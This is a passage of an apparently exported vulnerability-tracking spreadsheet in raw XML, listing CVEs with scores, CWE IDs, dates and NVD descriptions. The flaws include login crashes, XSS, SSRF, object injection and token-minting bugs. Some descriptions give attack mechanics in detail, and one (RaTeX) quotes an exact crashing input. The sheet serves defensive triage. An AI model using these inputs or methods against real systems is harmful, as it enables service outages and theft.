      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 fail to validate that the identityPublicKey in LoginPacket uses the required secp384r1 elliptic curve. Attackers can provide LoginPackets with keys using different curves or non-EC key types to pass login verification but trigger an uncaught exception during ECDH key derivation, crashing the server.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54355</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54390</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper null value handling in arrays. Attackers can send malformed JSON with unexpected null elements in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54390</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54393</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.20.5 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper validation in the JsonMapper dependency. Attackers can send malformed JSON structures in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54393</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58381</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.11.1 contains a denial of service vulnerability in LoginPacket JSON processing that allows remote attackers to crash the server by sending malformed JSON data. Attackers can exploit improper object initialization from scalar JSON types to trigger unset required properties, causing the application to crash.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58381</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58382</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.6.0 contain polynomial time complexity vulnerabilities in Markdown parsing that allow attackers to cause denial of service. Attackers can submit carefully crafted Markdown inputs designed to trigger worst-case performance, and sending multiple requests in parallel exhausts CPU resources and PHP-FPM processes.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58382</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14297</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>30a5e7fb-040d-440a-8cdf-a4a2068ce72e</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in the Bluetooth Continuous Glucose
     Monitoring Service (CGMS) Record Access Control Point (RACP) write handler
     allows an authenticated BLE peer to overflow a 20-byte static buffer into
     adjacent BSS memory. The exploitable impact cannot be predetermined - it
     is entirely dependent on the linker-assigned BSS layout of the specific
     firmware build, which may vary.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14297</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40877</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-94</t>
        </is>
      </c>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to PHP object injection in the user preference functionality, which can lead to remote code execution. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40877</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47665</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through file comments, whose content is stored as raw text and rendered into the page with innerHTML without any sanitization. Because the backend applies only a length check and the frontend writes comment content directly through innerHTML, any team member who can comment on a shared file can embed HTML such as an image error handler or script that executes in the browser of every other collaborator. The attack is passive: any user who opens the comments panel on the affected file triggers script execution on the Penpot origin, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47665</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53530</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-248, CWE-400</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, the public parser entrypoint `ratex_parser::parse(&amp;str)` panics on the 9-byte input `\verbéxé` (i.e. `\verb` followed by the non-ASCII delimiter `é`). When handling a `\verb` command, the parser slices the verbatim argument with byte indices (`arg[1..arg.len() - 1]`); if the delimiter character is multibyte UTF-8, index `1` lands inside that character and Rust panics with *“byte index 1 is not a char boundary”*. Because RaTeX’s release profile sets `panic = "abort"` (`Cargo.toml:48`), the panic aborts the entire process — not just the current request/thread — making this a hard denial of service for any service that renders untrusted LaTeX. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53530</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53758</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, article content is processed by Parsedown without enabling safe mode, which means raw HTML including &lt;script&gt; tags embedded in Markdown is passed through unescaped. The output is rendered with no additional sanitization, resulting in stored XSS visible to all site visitors. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53758</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53924</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. Prior to 0xc9d4e0dacd937364793278180551e59d93cd43f9, StreamingEscrow.claim() correctly rejects withdrawals while an escrow is disputed, but the permissionless syncOutflow() path performs the same excess-balance transfer without checking disputed. After a streaming proposal is challenged, anyone can call syncOutflow() to transfer escrowed SuperTokens to the proposal beneficiary while the dispute is pending. If the proposal is later rejected, those tokens cannot be recovered by drainToStrategy(). This issue has been patched in 0xc9d4e0dacd937364793278180551e59d93cd43f9.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53924</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55245</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Bifrost is an enterprise AI gateway for routing requests to model providers. Prior to 1.5.17, the isPublicIP function in core/providers/utils/fetch.go, reached through FetchAndEncodeURL for Bedrock and Vertex image or document URLs, classifies Carrier-Grade NAT 100.64.0.0/10, IPv6 6to4 2002::/16, NAT64 64:ff9b::/96 and 64:ff9b:1::/48, and deprecated IPv6 site-local fec0::/10 addresses as public. A remote attacker who controls a multimodal request URL can make the gateway fetch internal services, including a cloud instance metadata endpoint encoded through 6to4 or NAT64. This issue is fixed in version 1.5.17.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55245</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55763</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, processPercentageRoyaltiesTransfer in core/kapp/accounts/accounts.go calls SubFromBalance after the split loop and after the royaltiesToPay &lt;= 0 early return. computeSplitRoyalties rejects only when splitToPay &gt; royaltiesToPay, so a valid PercentTransferPercentage = 10000 split consumes exactly 100 percent of the royalty pool, sets royaltiesToPay to zero, and returns before the source account is debited. The split recipient receives the full royaltyAmount while the sender pays nothing and the supply counter is not updated, allowing unbounded off-the-books inflation of the transferred KDA. A KDA owner must configure a TransferPercentage royalty with a 100 percent split, after which any holder's transfer of the asset triggers the mint; the sibling processFixedRoyaltiesTransfer path is not affected because it debits the source before distribution. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55763</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55764</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, Klever-Go allows a mint-role holder to bypass a finite per-nonce MaxSupply on the semi-fungible token add-quantity path. In core/kapp/systemAccount/systemAcount.go, SFTAddCirculation performed meta.Circulation += amount before evaluating whether Circulation exceeded MaxSupply, without checking for signed int64 overflow. A large positive raw Amount supplied through processSemiFungibleAddQuantity in core/kapp/kda/mint.go can wrap Circulation negative, causing the signed maximum-supply comparison to pass and crediting approximately MaxInt64 units while corrupting the on-chain counter. The fungible path is not affected because its MintedValue &lt;= 0 guard detects the overflow. The correction uses the consensus activation flag FixMarketBuyOverflow. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55764</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57445</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In dfba919e218e20d52db9f7b2e8d292d45a46c91b and prior, normal beneficiary payout paths in StreamingEscrow preserve depositAmount() while an active stream needs an escrow reserve. However, the approve-side dispute resolution path drains the whole available escrow balance to the proposal beneficiary. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57445</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62865</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-73</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
